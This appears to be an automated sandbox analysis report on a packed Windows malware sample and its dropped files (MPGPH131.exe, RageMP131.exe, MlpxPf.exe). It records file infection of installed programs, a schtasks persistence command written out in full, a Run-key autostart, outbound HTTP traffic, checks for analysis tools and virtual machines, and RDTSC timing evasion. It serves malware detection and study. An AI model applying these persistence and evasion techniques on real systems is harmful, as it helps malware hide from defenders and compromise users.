            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: ntvdm64.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: ntvdm64.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: ntvdm64.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: ntvdm64.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: ntvdm64.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeAutomated click: OK
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeAutomated click: OK
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeAutomated click: OK
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeAutomated click: OK
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeAutomated click: OK
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeAutomated click: OK
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeAutomated click: OK
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: Lisect_AVT_24003_G1A_37.exeStatic file information: File size 2447360 > 1048576
            Source: Lisect_AVT_24003_G1A_37.exeStatic PE information: Raw size of xhwtmwwr is bigger than: 0x100000 < 0x1bca00
            Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.2.dr

            Data Obfuscation

            barindex
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeUnpacked PE file: 0.2.Lisect_AVT_24003_G1A_37.exe.270000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xhwtmwwr:EW;tmaftcgf:EW;.taggant:EW;%~u:EW; vs :ER;.rsrc:W;.idata :W; :EW;xhwtmwwr:EW;tmaftcgf:EW;.taggant:EW;%~u:EW;
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeUnpacked PE file: 2.2.MlpxPf.exe.350000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeUnpacked PE file: 8.2.MPGPH131.exe.830000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xhwtmwwr:EW;tmaftcgf:EW;.taggant:EW;%~u:EW; vs :ER;.rsrc:W;.idata :W; :EW;xhwtmwwr:EW;tmaftcgf:EW;.taggant:EW;%~u:EW;
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeUnpacked PE file: 11.2.MPGPH131.exe.830000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xhwtmwwr:EW;tmaftcgf:EW;.taggant:EW;%~u:EW; vs :ER;.rsrc:W;.idata :W; :EW;xhwtmwwr:EW;tmaftcgf:EW;.taggant:EW;%~u:EW;
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeUnpacked PE file: 17.2.RageMP131.exe.930000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xhwtmwwr:EW;tmaftcgf:EW;.taggant:EW;%~u:EW; vs :ER;.rsrc:W;.idata :W; :EW;xhwtmwwr:EW;tmaftcgf:EW;.taggant:EW;%~u:EW;
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeUnpacked PE file: 18.2.MlpxPf.exe.590000.0.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;
            Source: initial sampleStatic PE information: section where entry point is pointing to: %~u
            Source: Lisect_AVT_24003_G1A_37.exeStatic PE information: section name:
            Source: Lisect_AVT_24003_G1A_37.exeStatic PE information: section name: .idata
            Source: Lisect_AVT_24003_G1A_37.exeStatic PE information: section name:
            Source: Lisect_AVT_24003_G1A_37.exeStatic PE information: section name: xhwtmwwr
            Source: Lisect_AVT_24003_G1A_37.exeStatic PE information: section name: tmaftcgf
            Source: Lisect_AVT_24003_G1A_37.exeStatic PE information: section name: .taggant
            Source: Lisect_AVT_24003_G1A_37.exeStatic PE information: section name: %~u
            Source: RageMP131.exe.0.drStatic PE information: section name:
            Source: RageMP131.exe.0.drStatic PE information: section name: .idata
            Source: RageMP131.exe.0.drStatic PE information: section name:
            Source: RageMP131.exe.0.drStatic PE information: section name: xhwtmwwr
            Source: RageMP131.exe.0.drStatic PE information: section name: tmaftcgf
            Source: RageMP131.exe.0.drStatic PE information: section name: .taggant
            Source: RageMP131.exe.0.drStatic PE information: section name: %~u
            Source: MPGPH131.exe.0.drStatic PE information: section name:
            Source: MPGPH131.exe.0.drStatic PE information: section name: .idata
            Source: MPGPH131.exe.0.drStatic PE information: section name:
            Source: MPGPH131.exe.0.drStatic PE information: section name: xhwtmwwr
            Source: MPGPH131.exe.0.drStatic PE information: section name: tmaftcgf
            Source: MPGPH131.exe.0.drStatic PE information: section name: .taggant
            Source: MPGPH131.exe.0.drStatic PE information: section name: %~u
            Source: MlpxPf.exe.0.drStatic PE information: section name: .aspack
            Source: MlpxPf.exe.0.drStatic PE information: section name: .adata
            Source: Uninstall.exe.2.drStatic PE information: section name: EpNuZ
            Source: MyProg.exe.2.drStatic PE information: section name: PELIB
            Source: MyProg.exe.2.drStatic PE information: section name: Y|uR
            Source: SciTE.exe.2.drStatic PE information: section name: u
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeCode function: 0_2_0034D509 push ecx; ret 0_2_0034D51C
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeCode function: 2_2_00351638 push dword ptr [00353084h]; ret 2_2_0035170E
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeCode function: 2_2_00356014 push 003514E1h; ret 2_2_00356425
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeCode function: 2_2_00352D9B push ecx; ret 2_2_00352DAB
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeCode function: 2_2_0035600A push ebp; ret 2_2_0035600D
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_0090D509 push ecx; ret 8_2_0090D51C
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 11_2_0090D509 push ecx; ret 11_2_0090D51C
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 17_2_00A0D509 push ecx; ret 17_2_00A0D51C
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeCode function: 18_2_00591638 push dword ptr [00593084h]; ret 18_2_0059170E
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeCode function: 18_2_00592D9B push ecx; ret 18_2_00592DAB
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeCode function: 18_2_00596014 push 005914E1h; ret 18_2_00596425
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeCode function: 18_2_0059600A push ebp; ret 18_2_0059600D
            Source: Lisect_AVT_24003_G1A_37.exeStatic PE information: section name: entropy: 7.988087309899931
            Source: Lisect_AVT_24003_G1A_37.exeStatic PE information: section name: xhwtmwwr entropy: 7.91333326585716
            Source: Lisect_AVT_24003_G1A_37.exeStatic PE information: section name: %~u entropy: 6.934432600748185
            Source: RageMP131.exe.0.drStatic PE information: section name: entropy: 7.988087309899931
            Source: RageMP131.exe.0.drStatic PE information: section name: xhwtmwwr entropy: 7.91333326585716
            Source: RageMP131.exe.0.drStatic PE information: section name: %~u entropy: 6.934432600748185
            Source: MPGPH131.exe.0.drStatic PE information: section name: entropy: 7.988087309899931
            Source: MPGPH131.exe.0.drStatic PE information: section name: xhwtmwwr entropy: 7.91333326585716
            Source: MPGPH131.exe.0.drStatic PE information: section name: %~u entropy: 6.934432600748185
            Source: MlpxPf.exe.0.drStatic PE information: section name: .text entropy: 7.81169422100848
            Source: Uninstall.exe.2.drStatic PE information: section name: EpNuZ entropy: 6.93455438014042
            Source: MyProg.exe.2.drStatic PE information: section name: Y|uR entropy: 6.934974710878075
            Source: SciTE.exe.2.drStatic PE information: section name: u entropy: 6.934521566057065

            Persistence and Installation Behavior

            barindex
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeFile created: C:\Users\user\AppData\Local\Temp\MlpxPf.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeFile created: C:\ProgramData\MPGPH131\MPGPH131.exeJump to dropped file
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeFile created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeFile created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeFile created: C:\ProgramData\MPGPH131\MPGPH131.exeJump to dropped file

            Boot Survival

            barindex
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeWindow searched: window name: RegmonClassJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeWindow searched: window name: FilemonclassJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: RegmonClassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: FilemonclassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: RegmonClassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: FilemonclassJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: RegmonClassJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: FilemonClassJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: FilemonclassJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeWindow searched: window name: RegmonclassJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131Jump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131Jump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 799
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 799
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeStalling execution: Execution stalls by calling Sleepgraph_0-23594
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 53E6E5 second address: 53E6EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 53D629 second address: 53D62D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 53DA71 second address: 53DA86 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA4C9084156h 0x00000008 je 00007FA4C9084156h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 53DA86 second address: 53DA8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 53DA8B second address: 53DA9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FA4C9084156h 0x0000000a jnp 00007FA4C9084156h 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 53DF66 second address: 53DF8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C902634Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA4C9026355h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 53DF8B second address: 53DF8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 540A32 second address: 540A36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 540B10 second address: 540B26 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA4C9084162h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 540B26 second address: 540B45 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FA4C9026352h 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 540B45 second address: 540B74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 nop 0x00000007 stc 0x00000008 push 00000000h 0x0000000a add edi, dword ptr [ebp+122D378Eh] 0x00000010 push 0AEF717Dh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FA4C9084168h 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeRDTSC instruction interceptor: First address: 540B74 second address: 540B84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA4C902634Ch 0x00000009 rdtsc
